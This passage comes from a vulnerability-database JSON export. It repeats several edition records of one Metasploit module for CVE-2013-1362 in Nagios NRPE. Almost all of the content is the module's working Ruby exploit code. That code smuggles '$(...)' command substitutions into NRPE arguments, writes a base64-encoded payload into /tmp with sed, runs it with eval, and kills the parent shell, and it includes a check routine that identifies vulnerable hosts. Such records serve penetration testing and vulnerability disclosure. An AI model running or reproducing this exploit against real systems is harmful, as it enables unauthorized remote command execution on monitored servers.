datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T02:02:28", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T14:07:32", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T14:07:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T14:07:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T16:05:08", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T16:05:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T16:05:08", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T02:05:06", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T02:05:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T02:05:06", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T04:04:42", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T04:04:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T04:04:42", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T04:13:24", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T04:13:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll 